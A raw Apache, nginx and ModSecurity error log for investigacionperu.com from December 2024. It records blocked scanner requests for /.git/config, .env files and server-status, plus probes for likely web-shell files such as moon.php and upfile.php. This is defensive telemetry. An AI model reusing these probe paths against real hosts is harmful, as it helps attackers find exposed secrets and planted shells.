[Fri Dec 06 19:56:54.172191 2024] [authz_core:error] [pid 14271:tid 140311758014208] [client 139.59.132.8:46614] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/06 19:56:58 [error] 14136#14136: *324622 access forbidden by rule, client: 139.59.132.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Dec 07 02:13:41.000786 2024] [:error] [pid 14270:tid 140312032450304] [client 149.137.247.4:53586] [client 149.137.247.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-includes/wlwmanifest.xml"] [unique_id "Z1P1pDUQRusDHB5er0FAAgAAAAA"] 2024/12/07 16:45:35 [error] 25343#25343: *339240 access forbidden by rule, client: 3.76.30.244, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/08 06:02:38 [error] 18205#18205: *351436 access forbidden by rule, client: 45.148.10.236, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Dec 08 09:06:02.987490 2024] [:error] [pid 18248:tid 140466485909248] [client 78.153.140.222:37646] [client 78.153.140.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "grub-client"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/core/.env"] [unique_id "Z1WnymRBNN9oTs43V03PNQAAABI"] [Sun Dec 08 12:39:28.843337 2024] [authz_core:error] [pid 5154:tid 140466443945728] [client 209.97.180.8:45934] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/08 12:39:41 [error] 18205#18205: *357491 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Dec 08 17:42:54.789390 2024] [authz_core:error] [pid 19082:tid 140466435553024] [client 164.90.208.56:58708] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/08 17:42:58 [error] 18205#18205: *367243 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Dec 08 19:45:39.634281 2024] [autoindex:error] [pid 19082:tid 140466569836288] [client 128.199.21.27:34616] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Dec 08 20:21:33.872515 2024] [autoindex:error] [pid 19082:tid 140466636977920] [client 147.93.128.101:35196] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/08 20:40:53 [error] 18206#18206: *370604 access forbidden by rule, client: 45.148.10.236, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Dec 09 07:54:05.511602 2024] [autoindex:error] [pid 3957:tid 140270746171136] [client 20.192.23.207:47572] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/12/09 10:15:18 [error] 3919#3919: *379149 access forbidden by rule, client: 45.148.10.236, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Dec 09 17:09:27.298667 2024] [autoindex:error] [pid 3957:tid 140270762956544] [client 64.227.141.85:58166] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/12/09 19:06:26 [error] 3919#3919: *384058 access forbidden by rule, client: 45.148.10.236, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/09 19:54:11 [error] 3918#3918: *384508 access forbidden by rule, client: 18.156.35.7, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/10 03:06:54 [error] 3919#3919: *389517 access forbidden by rule, client: 35.88.20.159, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/10 08:53:32 [error] 9844#9844: *395852 access forbidden by rule, client: 35.88.20.159, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Dec 10 13:08:52.486945 2024] [:error] [pid 10443:tid 140472846587648] [client 154.26.133.94:53538] [client 154.26.133.94] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "14"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z1iDtD1jVn6x6yVKoViRbgAAAME"] [Tue Dec 10 13:50:46.328418 2024] [authz_core:error] [pid 9881:tid 140472626386688] [client 206.81.24.227:54516] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/10 13:50:51 [error] 9844#9844: *398995 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/10 13:58:47 [error] 9844#9844: *399067 access forbidden by rule, client: 18.156.35.7, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/10 16:05:49 [error] 9844#9844: *400101 access forbidden by rule, client: 18.156.35.7, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Dec 10 17:09:56.378769 2024] [authz_core:error] [pid 10443:tid 140472668350208] [client 143.110.217.244:58494] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/10 17:09:59 [error] 9843#9843: *400792 access forbidden by rule, client: 143.110.217.244, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/11 02:11:17 [error] 9844#9844: *410029 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/11 02:27:22 [error] 9844#9844: *410116 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 04:24:54 [error] 20714#20714: *410870 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/11 05:30:12 [error] 20713#20713: *411428 access forbidden by rule, client: 18.156.35.7, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/11 13:08:21 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/moon.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:08:35 [error] 20714#20714: *416997 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:08:40 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:08:56 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/admin.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:09:02 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/about.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:09:04 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/index.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:09:05 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/file.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:09:05 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/upfile.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:09:07 [error] 20714#20714: *416997 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/11 13:09:15 [error] 20714#20714: *416997 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 84.247.148.41, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/?p= HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Dec 12 09:53:16.179761 2024] [autoindex:error] [pid 30623:tid 140589488129792] [client 45.134.225.130:52842] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 09:53:17.073571 2024] [autoindex:error] [pid 30310:tid 140589429380864] [client 45.134.225.130:52844] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 09:53:25.439325 2024] [autoindex:error] [pid 30623:tid 140589420988160] [client 45.134.225.130:52864] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/12 09:53:25 [error] 30271#30271: *432683 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/12/12 09:53:26 [error] 30272#30272: *432684 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Thu Dec 12 09:53:26.913924 2024] [autoindex:error] [pid 30623:tid 140589446166272] [client 45.134.225.130:52866] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 09:58:19.112721 2024] [autoindex:error] [pid 30311:tid 140589412595456] [client 45.134.225.130:52988] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 09:58:20.102808 2024] [autoindex:error] [pid 30311:tid 140589379024640] [client 45.134.225.130:52990] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 09:58:24.265557 2024] [autoindex:error] [pid 30311:tid 140589370631936] [client 45.134.225.130:53004] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/12 09:58:25 [error] 30272#30272: *432770 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/12/12 09:58:26 [error] 30272#30272: *432771 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Thu Dec 12 09:58:27.834293 2024] [autoindex:error] [pid 30311:tid 140589345453824] [client 45.134.225.130:53006] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 11:31:05.633944 2024] [authz_core:error] [pid 30311:tid 140589429380864] [client 128.199.182.152:54946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/12 11:31:13 [error] 30272#30272: *433741 access forbidden by rule, client: 128.199.182.152, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Dec 12 11:46:01.236915 2024] [authz_core:error] [pid 30623:tid 140589412595456] [client 64.225.75.246:55424] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/12 11:46:06 [error] 30271#30271: *433916 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Dec 12 16:25:24.671123 2024] [autoindex:error] [pid 30310:tid 140589590157056] [client 108.165.243.8:35862] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Thu Dec 12 16:25:31.185341 2024] [autoindex:error] [pid 30310:tid 140589379024640] [client 108.165.243.8:35876] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/js/index.php [Thu Dec 12 16:25:45.373293 2024] [autoindex:error] [pid 30623:tid 140589513307904] [client 108.165.243.8:35912] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/maint/index.php [Thu Dec 12 16:25:51.984832 2024] [autoindex:error] [pid 30311:tid 140589598549760] [client 108.165.243.8:35926] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 16:25:54.443674 2024] [autoindex:error] [pid 30312:tid 140589429380864] [client 108.165.243.8:35934] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/uploads/index.php [Thu Dec 12 16:26:10.853006 2024] [autoindex:error] [pid 30310:tid 140589379024640] [client 108.165.243.8:35972] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/css/index.php [Thu Dec 12 16:26:11.118261 2024] [:error] [pid 30623:tid 140589513307904] [client 108.165.243.8:35974] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Dec 12 16:26:13.870344 2024] [autoindex:error] [pid 30311:tid 140589462951680] [client 108.165.243.8:35980] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/ID3/index.php [Thu Dec 12 16:26:16.554557 2024] [autoindex:error] [pid 30311:tid 140589446166272] [client 108.165.243.8:35986] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/images/index.php [Thu Dec 12 16:26:33.307201 2024] [autoindex:error] [pid 30623:tid 140589362239232] [client 108.165.243.8:36016] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/css/index.php [Thu Dec 12 16:26:40.998217 2024] [autoindex:error] [pid 30311:tid 140589353846528] [client 108.165.243.8:36034] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/languages/index.php [Thu Dec 12 16:26:44.946245 2024] [autoindex:error] [pid 30312:tid 140589496522496] [client 108.165.243.8:36042] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/SimplePie/index.php [Thu Dec 12 16:26:50.357141 2024] [autoindex:error] [pid 30311:tid 140589496522496] [client 108.165.243.8:36054] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/assets/index.php [Thu Dec 12 16:26:51.952335 2024] [autoindex:error] [pid 30312:tid 140589412595456] [client 108.165.243.8:36058] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/js/index.php [Thu Dec 12 16:26:56.356933 2024] [:error] [pid 30310:tid 140589362239232] [client 108.165.243.8:36068] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Dec 12 16:27:00.473326 2024] [autoindex:error] [pid 30311:tid 140589513307904] [client 108.165.243.8:36076] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/customize/index.php [Thu Dec 12 16:27:07.475507 2024] [autoindex:error] [pid 30623:tid 140589437773568] [client 108.165.243.8:36088] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/fonts/index.php [Thu Dec 12 16:27:20.941965 2024] [autoindex:error] [pid 30623:tid 140589337061120] [client 108.165.243.8:36114] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 12 16:27:32.331976 2024] [autoindex:error] [pid 30311:tid 140589598549760] [client 108.165.243.8:36134] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-includes/rest-api/index.php [Thu Dec 12 16:27:50.605139 2024] [:error] [pid 30623:tid 140589387417344] [client 108.165.243.8:36168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Dec 12 16:27:52.002378 2024] [autoindex:error] [pid 30623:tid 140589395810048] [client 108.165.243.8:36172] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/css/colors/index.php [Thu Dec 12 16:28:13.228285 2024] [:error] [pid 30310:tid 140589337061120] [client 108.165.243.8:36216] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Dec 12 16:28:35.593363 2024] [:error] [pid 30623:tid 140589462951680] [client 108.165.243.8:36256] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Thu Dec 12 16:28:54.685088 2024] [autoindex:error] [pid 30311:tid 140589446166272] [client 108.165.243.8:36296] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Thu Dec 12 16:29:47.510908 2024] [:error] [pid 30312:tid 140589488129792] [client 108.165.243.8:36408] File does not exist: 